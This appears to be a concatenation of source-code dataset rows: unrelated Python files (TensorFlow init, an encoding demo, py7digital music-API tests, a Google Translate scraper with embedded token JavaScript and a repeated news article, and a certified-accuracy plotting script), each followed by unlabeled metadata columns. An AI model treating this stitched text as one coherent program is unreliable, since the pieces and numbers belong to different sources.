"GLOBAL_INJECTED_PORTAL_IP_ADDR" : "10.0.9.1",
"GLOBAL_INJECTED_PUBLIC_NET_ID" : "971040b2-7059-49dc-b220-4fab50cb2ad4",
"GLOBAL_INJECTED_REGION" : "RegionOne",
"GLOBAL_INJECTED_REMOTE_REPO" : "http://gerrit.onap.org/r/testsuite/properties.git",
"GLOBAL_INJECTED_SCRIPT_VERSION" : "1.1.1",
"GLOBAL_INJECTED_SDC_IP_ADDR" : "10.0.3.1",
"GLOBAL_INJECTED_SDNC_IP_ADDR" : "10.0.7.1",
"GLOBAL_INJECTED_SO_IP_ADDR" : "10.0.5.1",
"GLOBAL_INJECTED_VID_IP_ADDR" : "10.0.8.1",
"GLOBAL_INJECTED_VM_FLAVOR" : "m1.medium",
"GLOBAL_INJECTED_UBUNTU_1404_IMAGE" : "ubuntu-14-04-cloud-amd64",
"GLOBAL_INJECTED_UBUNTU_1604_IMAGE" : "ubuntu-16-04-cloud-amd64"}
| 47.78481
| 119
| 0.793377
| 614
| 3,775
| 4.460912
| 0.19544
| 0.373129
| 0.087623
| 0.098576
| 0.934648
| 0.929536
| 0.929536
| 0.929536
| 0.929536
| 0.929536
| 0
| 0.10054
| 0.067285
| 3,775
| 78
| 120
| 48.397436
| 0.677364
| 0.046358
| 0
| 0
| 1
| 0
| 0.553547
| 0.350765
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.054795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
8e778bd172ed7802dec52dba84bd357874cda90a
| 136
|
py
|
Python
|
tensorflow/python/ops/structured/__init__.py
|
abhaikollara/tensorflow
|
4f96df3659696990cb34d0ad07dc67843c4225a9
|
[
"Apache-2.0"
] | 78
|
2020-08-04T12:36:25.000Z
|
2022-03-25T04:23:40.000Z
|
tensorflow/python/ops/structured/__init__.py
|
sseung0703/tensorflow
|
be084bd7a4dd241eb781fc704f57bcacc5c9b6dd
|
[
"Apache-2.0"
] | 1,056
|
2019-12-15T01:20:31.000Z
|
2022-02-10T02:06:28.000Z
|
tensorflow/python/ops/structured/__init__.py
|
sseung0703/tensorflow
|
be084bd7a4dd241eb781fc704f57bcacc5c9b6dd
|
[
"Apache-2.0"
] | 66
|
2020-05-15T10:05:12.000Z
|
2022-02-14T07:28:18.000Z
|
"""Structured Tensors."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
| 22.666667
| 38
| 0.838235
| 16
| 136
| 6.25
| 0.5625
| 0.3
| 0.48
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110294
| 136
| 5
| 39
| 27.2
| 0.826446
| 0.139706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8e9ea78512a9ffde0002fe841ea79c92368a4850
| 305
|
py
|
Python
|
codigo/Live34/errors/test.py
|
cassiasamp/live-de-python
|
00b5e51793097544ba9b75c97a0d30e63970bf45
|
[
"MIT"
] | 572
|
2018-04-03T03:17:08.000Z
|
2022-03-31T19:05:32.000Z
|
codigo/Live34/errors/test.py
|
cassiasamp/live-de-python
|
00b5e51793097544ba9b75c97a0d30e63970bf45
|
[
"MIT"
] | 176
|
2018-05-18T15:56:16.000Z
|
2022-03-28T20:39:07.000Z
|
codigo/Live34/errors/test.py
|
cassiasamp/live-de-python
|
00b5e51793097544ba9b75c97a0d30e63970bf45
|
[
"MIT"
] | 140
|
2018-04-18T13:59:11.000Z
|
2022-03-29T00:43:49.000Z
|
print(open('teste_win1252.txt', errors='strict').read())
print(open('teste_win1252.txt', errors='replace').read())
print(open('teste_win1252.txt', errors='ignore').read())
print(open('teste_win1252.txt', errors='surrogateescape').read())
print(open('teste_win1252.txt', errors='backslashreplace').read())
| 50.833333
| 66
| 0.737705
| 40
| 305
| 5.5
| 0.3
| 0.204545
| 0.318182
| 0.477273
| 0.754545
| 0.754545
| 0.618182
| 0
| 0
| 0
| 0
| 0.067797
| 0.032787
| 305
| 5
| 67
| 61
| 0.677966
| 0
| 0
| 0
| 0
| 0
| 0.442623
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
8ec04b48af6e767205faa527b644561798afc507
| 3,304
|
py
|
Python
|
tests/search_acceptance_tests.py
|
7digital/python-7digital-api
|
cfb9b996dafe36ae5b00af3986531c1b3387cb2f
|
[
"MIT"
] | 1
|
2018-06-24T08:28:27.000Z
|
2018-06-24T08:28:27.000Z
|
tests/search_acceptance_tests.py
|
7digital/python-7digital-api
|
cfb9b996dafe36ae5b00af3986531c1b3387cb2f
|
[
"MIT"
] | null | null | null |
tests/search_acceptance_tests.py
|
7digital/python-7digital-api
|
cfb9b996dafe36ae5b00af3986531c1b3387cb2f
|
[
"MIT"
] | null | null | null |
import py7digital
#Search artist
results = py7digital.search_artist('stones')
print results.get_total_result_count()
for artist in results.get_next_page():
print artist.get_name() #, artist.get_image(), artist.get_url(), artist.get_tags()
print '\tTop tracks:'
for top_track in artist.get_top_tracks():
print '\t\t', top_track.get_title(), top_track.get_isrc(), top_track.get_duration(), top_track.get_position(), top_track.get_explicit(), top_track.get_version()
print '\tRec. Albums:'
for rec_album in artist.get_recommended_albums():
print '\t\t', rec_album, rec_album.get_year() #, album.get_barcode(), album.get_type(), album.get_artist(), album.get_tags(), album.get_label()
for album in artist.get_albums(5):
print '\t', album, album.get_year(), album.get_barcode(), album.get_type(), album.get_artist(), album.get_tags(), album.get_label(), album.get_release_date(), album.get_added_date()
for sim_album in album.get_similar():
print '\t\tSimilar:', sim_album, sim_album.get_year(), sim_album.get_artist()
for track in album.get_tracks():
print '\t\t', track, track.get_isrc() #, track.get_url(), track.get_audio()
#Browse artists starting with 'J'
results = py7digital.browse_artists('j')
print results.get_total_result_count()
for artist in results.get_next_page():
print artist.get_name() #, artist.get_image(), artist.get_url(), artist.get_tags()
for album in artist.get_albums(2):
print '\t', album, album.get_year() #album.get_barcode(), album.get_type(), album.get_artist(), album.get_tags(), album.get_label()
for track in album.get_tracks():
print '\t\t', track.get_title(), track.get_isrc() #, track.get_url(), track.get_audio()
#Search albums
searcher = py7digital.search_album('u2')
print searcher.get_total_result_count()
while searcher.has_results():
for album in searcher.get_next_page():
print album, album.get_similar()
#Search tracks
searcher = py7digital.search_track('u2 one')
print searcher.get_total_result_count()
while searcher.has_results():
for track in searcher.get_next_page():
print track
# New releases in a given period of time
results = py7digital.album_releases('20100901', '20100924')
for album in results.get_next_page():
print album, album.get_year(), album.get_barcode(), album.get_type(), album.get_artist(), album.get_tags(), album.get_label(), album.get_release_date(), album.get_added_date()
for sim_album in album.get_similar():
print '\tSimilar:', sim_album, sim_album.get_year(), sim_album.get_artist()
for track in album.get_tracks():
print '\t', track, track.get_isrc() #, track.get_url(), track.get_audio()
# Album charts in a given period of time
results = py7digital.album_charts('month', '20100901')
for album in results.get_next_page():
print album, album.get_year(), album.get_barcode(), album.get_type(), album.get_artist(), album.get_tags(), album.get_label(), album.get_release_date(), album.get_added_date()
for sim_album in album.get_similar():
print '\tSimilar:', sim_album, sim_album.get_year(), sim_album.get_artist()
for track in album.get_tracks():
print '\t', track, track.get_isrc() #, track.get_url(), track.get_audio()
| 52.444444
| 189
| 0.712772
| 496
| 3,304
| 4.459677
| 0.139113
| 0.180832
| 0.0434
| 0.0434
| 0.756781
| 0.756781
| 0.719259
| 0.706148
| 0.706148
| 0.651899
| 0
| 0.012337
| 0.141344
| 3,304
| 62
| 190
| 53.290323
| 0.76736
| 0.18069
| 0
| 0.510204
| 0
| 0
| 0.047177
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.020408
| null | null | 0.469388
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
d95538d11eb5d122f25ddb986c4b20f8d87aa375
| 11,429
|
py
|
Python
|
baikeSpider/google_translate/translate.py
|
pluto-junzeng/baiduSpider
|
ea591920cd0994e83e36f033f98c6cc6859141d6
|
[
"Apache-2.0"
] | 13
|
2020-12-07T03:19:12.000Z
|
2022-01-19T13:02:41.000Z
|
baikeSpider/google_translate/translate.py
|
zengjunjun/baiduSpider
|
ea591920cd0994e83e36f033f98c6cc6859141d6
|
[
"Apache-2.0"
] | null | null | null |
baikeSpider/google_translate/translate.py
|
zengjunjun/baiduSpider
|
ea591920cd0994e83e36f033f98c6cc6859141d6
|
[
"Apache-2.0"
] | 3
|
2021-07-10T08:24:55.000Z
|
2022-01-19T13:02:43.000Z
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author:lichunhui
@Time: 2018/7/19 16:05
@Description: 利用谷歌翻译进行因为文本翻译
"""
import urllib.request
import urllib.parse
import execjs
import random
import json
import asyncio
from aiohttp import ClientSession
from baikeSpider.settings import MY_USER_AGENT
from ..logger import download_logger
__all__ = ['GoogleTranslate']
class Py4Js(object):
""" 执行js脚本计算出tk值 """
def __init__(self):
self.ctx = execjs.compile(
"""
function TL(a) {
var k = "";
var b = 406644;
var b1 = 3293161072;
var jd = ".";
var $b = "+-a^+6";
var Zb = "+-3^+b+-f";
for (var e = [], f = 0, g = 0; g < a.length; g++) {
var m = a.charCodeAt(g);
128 > m ? e[f++] = m : (2048 > m ? e[f++] = m >> 6 | 192 : (55296 == (m & 64512) && g + 1 < a.length && 56320 == (a.charCodeAt(g + 1) & 64512) ? (m = 65536 + ((m & 1023) << 10) + (a.charCodeAt(++g) & 1023),
e[f++] = m >> 18 | 240,
e[f++] = m >> 12 & 63 | 128) : e[f++] = m >> 12 | 224,
e[f++] = m >> 6 & 63 | 128),
e[f++] = m & 63 | 128)
}
a = b;
for (f = 0; f < e.length; f++) a += e[f],
a = RL(a, $b);
a = RL(a, Zb);
a ^= b1 || 0;
0 > a && (a = (a & 2147483647) + 2147483648);
a %= 1E6;
return a.toString() + jd + (a ^ b)
};
function RL(a, b) {
var t = "a";
var Yb = "+";
for (var c = 0; c < b.length - 2; c += 3) {
var d = b.charAt(c + 2),
d = d >= t ? d.charCodeAt(0) - 87 : Number(d),
d = b.charAt(c + 1) == Yb ? a >>> d: a << d;
a = b.charAt(c) == Yb ? a + d & 4294967295 : a ^ d
}
return a
}
""")
def getTk(self, text):
return self.ctx.call("TL", text)
class GoogleTranslate(object):
""" 调用谷歌翻译api """
def __init__(self):
self.js = Py4Js()
async def open_url(self, url, header, sem):
async with ClientSession() as session:
async with sem:
data = ''
try:
async with session.post(url=url, headers=header) as response:
response = await response.read()
data = response.decode('utf8')
except TimeoutError as e:
print(e)
download_logger.error("google translate timeout: {} ".format(e))
finally:
return data
def translate(self, content):
length = len(content) # 传入内容长度
sem = asyncio.Semaphore(50)
loop = asyncio.get_event_loop()
tasks = []
n = length // 5000 # 分n次发送进行翻译
remainder = length % 5000 # 剩余字节
if remainder > 0:
n += 1
for i in range(1, n + 1):
splitContent = content[5000 * (i - 1):5000 * i]
# print("第%s次分割后的结果,此次长度为%s" % (i, len(splitContent)))
tk = self.js.getTk(splitContent)
splitContent = urllib.parse.quote(splitContent)
headers = {'User-Agent': self.randomAgent()}
url = "http://translate.google.cn/translate_a/single?client=t" \
"&sl=en&tl=zh-CN&hl=zh-CN&dt=at&dt=bd&dt=ex&dt=ld&dt=md&dt=qca" \
"&dt=rw&dt=rm&dt=ss&dt=t&ie=UTF-8&oe=UTF-8&clearbtn=1&otf=1&pc=1" \
"&srcrom=0&ssel=0&tsel=0&kc=2&tk=%s&q=%s" % (tk, splitContent)
tasks.append(asyncio.ensure_future(self.open_url(url, headers, sem)))
res_list = loop.run_until_complete(asyncio.gather(*tasks))
result = ""
for res in res_list:
result += self.parse_json(res)
# print(result)
return result
@staticmethod
def parse_json(data):
result = ''
if data:
jsns = json.loads(data)[0]
for lst in jsns:
if not lst[0]:
continue
result += lst[0]
return result
@staticmethod
def randomAgent():
agent_pools = MY_USER_AGENT
return random.sample(agent_pools, 1)[0]
if __name__ == '__main__':
import time
gl = GoogleTranslate()
c = '''
President Donald Trump should work to form a "cyber NATO" in response to the Russian attack on the 2016 US elections and to prevent more cyber attacks, Rep. Joaquin Castro said Wednesday, even though NATO already cooperates on cybersecurity.
"He should be engaging with our allies to basically form a version of a cyber NATO, where with our allies, our close allies, we agree to essentially mutual defense in cyberspace and, if necessary, mutual cyber response," the Texas Democrat said in an interview with CNN's Wolf Blitzer on "The Situation Room."
According to a NATO fact sheet on cyber defense, NATO allies agreed to work together on cybersecurity in 2014."To keep pace with the rapidly changing threat landscape, NATO adopted an enhanced policy and action plan on cyber defence, endorsed by Allies at the Wales Summit in September 2014," the document reads. "The policy establishes that cyber defence is part of the Alliance's core task of collective defence, confirms that international law applies in cyberspace and intensifies NATO's cooperation with industry."
Castro also called for additional cybersecurity measures domestically.Trump should be "investing in greater election security and having the Congress work with state governments to pass laws to establish even a basic level of cybersecurity protection and election protection for our voting systems," he said. "Right now there isn't a single law -- and I can't find a state law -- that does that."
Castro also questioned Trump's commitment to protecting the US from attacks."Right now, quite honestly, it doesn't look like the President is fully committed to keeping the United States safe from Russian interference," he said.
President Donald Trump should work to form a "cyber NATO" in response to the Russian attack on the 2016 US elections and to prevent more cyber attacks, Rep. Joaquin Castro said Wednesday, even though NATO already cooperates on cybersecurity.
"He should be engaging with our allies to basically form a version of a cyber NATO, where with our allies, our close allies, we agree to essentially mutual defense in cyberspace and, if necessary, mutual cyber response," the Texas Democrat said in an interview with CNN's Wolf Blitzer on "The Situation Room."
According to a NATO fact sheet on cyber defense, NATO allies agreed to work together on cybersecurity in 2014."To keep pace with the rapidly changing threat landscape, NATO adopted an enhanced policy and action plan on cyber defence, endorsed by Allies at the Wales Summit in September 2014," the document reads. "The policy establishes that cyber defence is part of the Alliance's core task of collective defence, confirms that international law applies in cyberspace and intensifies NATO's cooperation with industry."
Castro also called for additional cybersecurity measures domestically.Trump should be "investing in greater election security and having the Congress work with state governments to pass laws to establish even a basic level of cybersecurity protection and election protection for our voting systems," he said. "Right now there isn't a single law -- and I can't find a state law -- that does that."
Castro also questioned Trump's commitment to protecting the US from attacks."Right now, quite honestly, it doesn't look like the President is fully committed to keeping the United States safe from Russian interference," he said.
President Donald Trump should work to form a "cyber NATO" in response to the Russian attack on the 2016 US elections and to prevent more cyber attacks, Rep. Joaquin Castro said Wednesday, even though NATO already cooperates on cybersecurity.
"He should be engaging with our allies to basically form a version of a cyber NATO, where with our allies, our close allies, we agree to essentially mutual defense in cyberspace and, if necessary, mutual cyber response," the Texas Democrat said in an interview with CNN's Wolf Blitzer on "The Situation Room."
According to a NATO fact sheet on cyber defense, NATO allies agreed to work together on cybersecurity in 2014."To keep pace with the rapidly changing threat landscape, NATO adopted an enhanced policy and action plan on cyber defence, endorsed by Allies at the Wales Summit in September 2014," the document reads. "The policy establishes that cyber defence is part of the Alliance's core task of collective defence, confirms that international law applies in cyberspace and intensifies NATO's cooperation with industry."
Castro also called for additional cybersecurity measures domestically.Trump should be "investing in greater election security and having the Congress work with state governments to pass laws to establish even a basic level of cybersecurity protection and election protection for our voting systems," he said. "Right now there isn't a single law -- and I can't find a state law -- that does that."
Castro also questioned Trump's commitment to protecting the US from attacks."Right now, quite honestly, it doesn't look like the President is fully committed to keeping the United States safe from Russian interference," he said.
President Donald Trump should work to form a "cyber NATO" in response to the Russian attack on the 2016 US elections and to prevent more cyber attacks, Rep. Joaquin Castro said Wednesday, even though NATO already cooperates on cybersecurity.
"He should be engaging with our allies to basically form a version of a cyber NATO, where with our allies, our close allies, we agree to essentially mutual defense in cyberspace and, if necessary, mutual cyber response," the Texas Democrat said in an interview with CNN's Wolf Blitzer on "The Situation Room."
According to a NATO fact sheet on cyber defense, NATO allies agreed to work together on cybersecurity in 2014."To keep pace with the rapidly changing threat landscape, NATO adopted an enhanced policy and action plan on cyber defence, endorsed by Allies at the Wales Summit in September 2014," the document reads. "The policy establishes that cyber defence is part of the Alliance's core task of collective defence, confirms that international law applies in cyberspace and intensifies NATO's cooperation with industry."
Castro also called for additional cybersecurity measures domestically.Trump should be "investing in greater election security and having the Congress work with state governments to pass laws to establish even a basic level of cybersecurity protection and election protection for our voting systems," he said. "Right now there isn't a single law -- and I can't find a state law -- that does that."
Castro also questioned Trump's commitment to protecting the US from attacks."Right now, quite honestly, it doesn't look like the President is fully committed to keeping the United States safe from Russian interference," he said.&&
'''
print(len(c))
start = time.time()
gl.translate(c)
end = time.time()
print("总共耗时%s秒" % (end - start))
# for i in range(10):
# print(gl.randomAgent())
| 67.627219
| 519
| 0.6704
| 1,671
| 11,429
| 4.561341
| 0.20766
| 0.002362
| 0.010496
| 0.013645
| 0.723695
| 0.721595
| 0.721595
| 0.721595
| 0.721595
| 0.721595
| 0
| 0.028312
| 0.249016
| 11,429
| 168
| 520
| 68.029762
| 0.859723
| 0.024149
| 0
| 0.25
| 0
| 0.23
| 0.736062
| 0.016891
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06
| false
| 0.04
| 0.1
| 0.01
| 0.23
| 0.03
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d9822178e1654276908ec086bfeb4c1abf9ded8c
| 12,688
|
py
|
Python
|
pytorch_ares/third_party/hydra/locuslab_smoothing/analyze.py
|
thu-ml/realsafe
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 107
|
2020-06-15T09:55:11.000Z
|
2020-12-20T11:27:11.000Z
|
pytorch_ares/third_party/hydra/locuslab_smoothing/analyze.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 7
|
2020-06-14T03:00:18.000Z
|
2020-12-07T07:10:10.000Z
|
pytorch_ares/third_party/hydra/locuslab_smoothing/analyze.py
|
haichen-ber/ares
|
474d549aa402b4cdd5e3629d23d035c31b60a360
|
[
"MIT"
] | 19
|
2020-06-14T08:35:33.000Z
|
2020-12-19T13:43:41.000Z
|
import numpy as np
import matplotlib
# matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
from typing import *
import pandas as pd
import seaborn as sns
import math
sns.set()
class Accuracy(object):
def at_radii(self, radii: np.ndarray):
raise NotImplementedError()
class ApproximateAccuracy(Accuracy):
def __init__(self, data_file_path: str):
self.data_file_path = data_file_path
def at_radii(self, radii: np.ndarray) -> np.ndarray:
df = pd.read_csv(self.data_file_path, delimiter="\t")
return np.array([self.at_radius(df, radius) for radius in radii])
def at_radius(self, df: pd.DataFrame, radius: float):
return (df["correct"] & (df["radius"] >= radius)).mean()
class HighProbAccuracy(Accuracy):
def __init__(self, data_file_path: str, alpha: float, rho: float):
self.data_file_path = data_file_path
self.alpha = alpha
self.rho = rho
def at_radii(self, radii: np.ndarray) -> np.ndarray:
df = pd.read_csv(self.data_file_path, delimiter="\t")
return np.array([self.at_radius(df, radius) for radius in radii])
def at_radius(self, df: pd.DataFrame, radius: float):
mean = (df["correct"] & (df["radius"] >= radius)).mean()
num_examples = len(df)
return (
mean
- self.alpha
- math.sqrt(
self.alpha * (1 - self.alpha) * math.log(1 / self.rho) / num_examples
)
- math.log(1 / self.rho) / (3 * num_examples)
)
class Line(object):
def __init__(
self, quantity: Accuracy, legend: str, plot_fmt: str = "", scale_x: float = 1
):
self.quantity = quantity
self.legend = legend
self.plot_fmt = plot_fmt
self.scale_x = scale_x
def plot_certified_accuracy(
outfile: str,
title: str,
max_radius: float,
lines: List[Line],
radius_step: float = 0.01,
) -> None:
radii = np.arange(0, max_radius + radius_step, radius_step)
plt.figure()
for line in lines:
plt.plot(radii * line.scale_x, line.quantity.at_radii(radii), line.plot_fmt)
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.tick_params(labelsize=14)
plt.xlabel("radius", fontsize=16)
plt.ylabel("certified accuracy", fontsize=16)
plt.legend([method.legend for method in lines], loc="upper right", fontsize=16)
plt.savefig(outfile + ".pdf")
plt.tight_layout()
plt.title(title, fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".png", dpi=300)
plt.close()
def smallplot_certified_accuracy(
outfile: str,
title: str,
max_radius: float,
methods: List[Line],
radius_step: float = 0.01,
xticks=0.5,
) -> None:
radii = np.arange(0, max_radius + radius_step, radius_step)
plt.figure()
for method in methods:
plt.plot(radii, method.quantity.at_radii(radii), method.plot_fmt)
plt.ylim((0, 1))
plt.xlim((0, max_radius))
plt.xlabel("radius", fontsize=22)
plt.ylabel("certified accuracy", fontsize=22)
plt.tick_params(labelsize=20)
plt.gca().xaxis.set_major_locator(plt.MultipleLocator(xticks))
plt.legend([method.legend for method in methods], loc="upper right", fontsize=20)
plt.tight_layout()
plt.savefig(outfile + ".pdf")
plt.close()
def latex_table_certified_accuracy(
outfile: str,
radius_start: float,
radius_stop: float,
radius_step: float,
methods: List[Line],
):
radii = np.arange(radius_start, radius_stop + radius_step, radius_step)
accuracies = np.zeros((len(methods), len(radii)))
for i, method in enumerate(methods):
accuracies[i, :] = method.quantity.at_radii(radii)
f = open(outfile, "w")
for radius in radii:
f.write("& $r = {:.3}$".format(radius))
f.write("\\\\\n")
f.write("\midrule\n")
for i, method in enumerate(methods):
f.write(method.legend)
for j, radius in enumerate(radii):
if i == accuracies[:, j].argmax():
txt = r" & \textbf{" + "{:.2f}".format(accuracies[i, j]) + "}"
else:
txt = " & {:.2f}".format(accuracies[i, j])
f.write(txt)
f.write("\\\\\n")
f.close()
def markdown_table_certified_accuracy(
outfile: str,
radius_start: float,
radius_stop: float,
radius_step: float,
methods: List[Line],
):
radii = np.arange(radius_start, radius_stop + radius_step, radius_step)
accuracies = np.zeros((len(methods), len(radii)))
for i, method in enumerate(methods):
accuracies[i, :] = method.quantity.at_radii(radii)
f = open(outfile, "w")
f.write("| | ")
for radius in radii:
f.write("r = {:.3} |".format(radius))
f.write("\n")
f.write("| --- | ")
for i in range(len(radii)):
f.write(" --- |")
f.write("\n")
for i, method in enumerate(methods):
f.write("<b> {} </b>| ".format(method.legend))
for j, radius in enumerate(radii):
if i == accuracies[:, j].argmax():
txt = "{:.2f}<b>*</b> |".format(accuracies[i, j])
else:
txt = "{:.2f} |".format(accuracies[i, j])
f.write(txt)
f.write("\n")
f.close()
if __name__ == "__main__":
latex_table_certified_accuracy(
"analysis/latex/vary_noise_cifar10",
0.25,
1.5,
0.25,
[
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.12/test/sigma_0.12"
),
"$\sigma = 0.12$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.25/test/sigma_0.25"
),
"$\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.50/test/sigma_0.50"
),
"$\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_1.00/test/sigma_1.00"
),
"$\sigma = 1.00$",
),
],
)
markdown_table_certified_accuracy(
"analysis/markdown/vary_noise_cifar10",
0.25,
1.5,
0.25,
[
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.12/test/sigma_0.12"
),
"σ = 0.12",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.25/test/sigma_0.25"
),
"σ = 0.25",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.50/test/sigma_0.50"
),
"σ = 0.50",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_1.00/test/sigma_1.00"
),
"σ = 1.00",
),
],
)
latex_table_certified_accuracy(
"analysis/latex/vary_noise_imagenet",
0.5,
3.0,
0.5,
[
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.25/test/sigma_0.25"
),
"$\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50"
),
"$\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_1.00/test/sigma_1.00"
),
"$\sigma = 1.00$",
),
],
)
markdown_table_certified_accuracy(
"analysis/markdown/vary_noise_imagenet",
0.5,
3.0,
0.5,
[
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.25/test/sigma_0.25"
),
"σ = 0.25",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50"
),
"σ = 0.50",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_1.00/test/sigma_1.00"
),
"σ = 1.00",
),
],
)
plot_certified_accuracy(
"analysis/plots/vary_noise_cifar10",
"CIFAR-10, vary $\sigma$",
1.5,
[
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.12/test/sigma_0.12"
),
"$\sigma = 0.12$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.25/test/sigma_0.25"
),
"$\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.50/test/sigma_0.50"
),
"$\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_1.00/test/sigma_1.00"
),
"$\sigma = 1.00$",
),
],
)
plot_certified_accuracy(
"analysis/plots/vary_train_noise_cifar_050",
"CIFAR-10, vary train noise, $\sigma=0.5$",
1.5,
[
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.25/test/sigma_0.50"
),
"train $\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_0.50/test/sigma_0.50"
),
"train $\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/cifar10/resnet110/noise_1.00/test/sigma_0.50"
),
"train $\sigma = 1.00$",
),
],
)
plot_certified_accuracy(
"analysis/plots/vary_train_noise_imagenet_050",
"ImageNet, vary train noise, $\sigma=0.5$",
1.5,
[
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.25/test/sigma_0.50"
),
"train $\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50"
),
"train $\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_1.00/test/sigma_0.50"
),
"train $\sigma = 1.00$",
),
],
)
plot_certified_accuracy(
"analysis/plots/vary_noise_imagenet",
"ImageNet, vary $\sigma$",
4,
[
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.25/test/sigma_0.25"
),
"$\sigma = 0.25$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50"
),
"$\sigma = 0.50$",
),
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_1.00/test/sigma_1.00"
),
"$\sigma = 1.00$",
),
],
)
plot_certified_accuracy(
"analysis/plots/high_prob",
"Approximate vs. High-Probability",
2.0,
[
Line(
ApproximateAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50"
),
"Approximate",
),
Line(
HighProbAccuracy(
"data/certify/imagenet/resnet50/noise_0.50/test/sigma_0.50",
0.001,
0.001,
),
"High-Prob",
),
],
)
| 29.714286
| 85
| 0.492276
| 1,315
| 12,688
| 4.593916
| 0.124715
| 0.043701
| 0.125145
| 0.15759
| 0.810793
| 0.785135
| 0.776196
| 0.743089
| 0.705016
| 0.677206
| 0
| 0.059658
| 0.377759
| 12,688
| 426
| 86
| 29.784038
| 0.70551
| 0.001813
| 0
| 0.710997
| 0
| 0
| 0.224135
| 0.155505
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030691
| false
| 0
| 0.017903
| 0.002558
| 0.069054
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7945e83218e926ccf4ced98eb59de90b751562f0
| 68
|
py
|
Python
|
rest-api/flask_app/auth/__init__.py
|
sinedie/Flask-Svelte-Websockets-Nginx-Docker
|
76daeec2c76f9f27ca526f53393ab4363020b92b
|
[
"WTFPL"
] | 4
|
2021-11-21T14:04:15.000Z
